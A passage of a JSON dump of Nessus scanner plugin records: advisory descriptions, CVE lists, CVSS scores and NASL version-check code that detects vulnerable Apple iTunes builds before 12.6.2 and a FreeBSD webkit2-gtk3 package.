CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this to\n execute arbitrary code with system privileges.\n (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-25T00:00:00", "title": "Apple iTunes < 12.6.2 Multiple Vulnerabilities (credentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7053", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_6_2.NASL", "href": "https://www.tenable.com/plugins/nessus/101954", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101954);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-7010\",\n \"CVE-2017-7012\",\n \"CVE-2017-7013\",\n \"CVE-2017-7018\",\n \"CVE-2017-7019\",\n \"CVE-2017-7020\",\n \"CVE-2017-7030\",\n \"CVE-2017-7034\",\n \"CVE-2017-7037\",\n \"CVE-2017-7039\",\n \"CVE-2017-7040\",\n \"CVE-2017-7041\",\n \"CVE-2017-7042\",\n \"CVE-2017-7043\",\n \"CVE-2017-7046\",\n \"CVE-2017-7048\",\n \"CVE-2017-7049\",\n \"CVE-2017-7052\",\n \"CVE-2017-7053\",\n \"CVE-2017-7055\",\n \"CVE-2017-7056\",\n \"CVE-2017-7061\",\n \"CVE-2017-7064\"\n );\n script_bugtraq_id(\n 99879,\n 99884,\n 99885,\n 99889,\n 99890\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-07-19-6\");\n\n script_name(english:\"Apple iTunes < 12.6.2 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.6.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this to\n execute arbitrary code with system privileges.\n (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207928\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.6.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7053\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.6.2\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T03:32:52", "description": "The version of Apple iTunes running on the remote host is prior to\n12.6.2. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this, via\n a specially crafted application, to execute arbitrary\n code with system privileges. (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-25T00:00:00", "title": "Apple iTunes < 12.6.2 Multiple Vulnerabilities (uncredentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7053", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_6_2_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/101955", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101955);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-7010\",\n \"CVE-2017-7012\",\n \"CVE-2017-7013\",\n \"CVE-2017-7018\",\n \"CVE-2017-7019\",\n \"CVE-2017-7020\",\n \"CVE-2017-7030\",\n \"CVE-2017-7034\",\n \"CVE-2017-7037\",\n \"CVE-2017-7039\",\n \"CVE-2017-7040\",\n \"CVE-2017-7041\",\n \"CVE-2017-7042\",\n \"CVE-2017-7043\",\n \"CVE-2017-7046\",\n \"CVE-2017-7048\",\n \"CVE-2017-7049\",\n \"CVE-2017-7052\",\n \"CVE-2017-7053\",\n \"CVE-2017-7055\",\n \"CVE-2017-7056\",\n \"CVE-2017-7061\",\n \"CVE-2017-7064\"\n );\n script_bugtraq_id(\n 99879,\n 99884,\n 99885,\n 99889,\n 99890\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-07-19-6\");\n\n script_name(english:\"Apple iTunes < 12.6.2 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes running on the remote host is prior to\n12.6.2. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this, via\n a specially crafted application, to execute arbitrary\n code with system privileges. (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207928\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.6.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7053\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nfixed_version = \"12.6.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T03:37:59", "description": "The version of Apple iTunes installed on the remote macOS or Mac OS X\nhost is prior to 12.6.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this to\n execute arbitrary code with system privileges.\n (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-25T00:00:00", "title": "Apple iTunes < 12.6.2 Multiple Vulnerabilities (macOS) (credentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7053", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "MACOS_ITUNES_12_6_2.NASL", "href": "https://www.tenable.com/plugins/nessus/101956", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101956);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-7010\",\n \"CVE-2017-7012\",\n \"CVE-2017-7013\",\n \"CVE-2017-7018\",\n \"CVE-2017-7019\",\n \"CVE-2017-7020\",\n \"CVE-2017-7030\",\n \"CVE-2017-7034\",\n \"CVE-2017-7037\",\n \"CVE-2017-7039\",\n \"CVE-2017-7040\",\n \"CVE-2017-7041\",\n \"CVE-2017-7042\",\n \"CVE-2017-7043\",\n \"CVE-2017-7046\",\n \"CVE-2017-7048\",\n \"CVE-2017-7049\",\n \"CVE-2017-7052\",\n \"CVE-2017-7053\",\n \"CVE-2017-7055\",\n \"CVE-2017-7056\",\n \"CVE-2017-7061\",\n \"CVE-2017-7064\"\n );\n script_bugtraq_id(\n 99879,\n 99884,\n 99885,\n 99889,\n 99890\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-07-19-6\");\n\n script_name(english:\"Apple iTunes < 12.6.2 Multiple Vulnerabilities (macOS) (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote macOS or Mac OS X\nhost is prior to 12.6.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this to\n execute arbitrary code with system privileges.\n (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207928\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.6.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7053\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_itunes_detect.nasl\");\n script_require_keys(\"Host/MacOSX/Version\", \"installed_sw/iTunes\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp_info = vcf::get_app_info(app:\"iTunes\");\n\nconstraints = [{\"fixed_version\" : \"12.6.2\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:47:20", "description": "The Webkit gtk team reports :\n\nPlease reference CVE/URL list for details", "edition": 25, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-26T00:00:00", "title": "FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (0f66b901-715c-11e7-ad1f-bcaec565249c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7038", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7030", "CVE-2017-7041"], "modified": "2017-07-26T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:webkit2-gtk3"], "id": "FREEBSD_PKG_0F66B901715C11E7AD1FBCAEC565249C.NASL", "href": "https://www.tenable.com/plugins/nessus/101966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101966);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-7006\", \"CVE-2017-7011\", \"CVE-2017-7012\", \"CVE-2017-7018\", \"CVE-2017-7019\", \"CVE-2017-7020\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7038\", \"CVE-2017-7039\", \"CVE-2017-7040\", \"CVE-2017-7041\", \"CVE-2017-7042\", \"CVE-2017-7043\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7049\", \"CVE-2017-7052\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7059\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n\n script_name(english:\"FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (0f66b901-715c-11e7-ad1f-bcaec565249c)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Webkit gtk team reports :\n\nPlease reference CVE/URL list for details\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2017-0006.html\"\n );\n # https://vuxml.freebsd.org/freebsd/0f66b901-715c-11e7-ad1f-bcaec565249c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?071f4a9f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit2-gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", 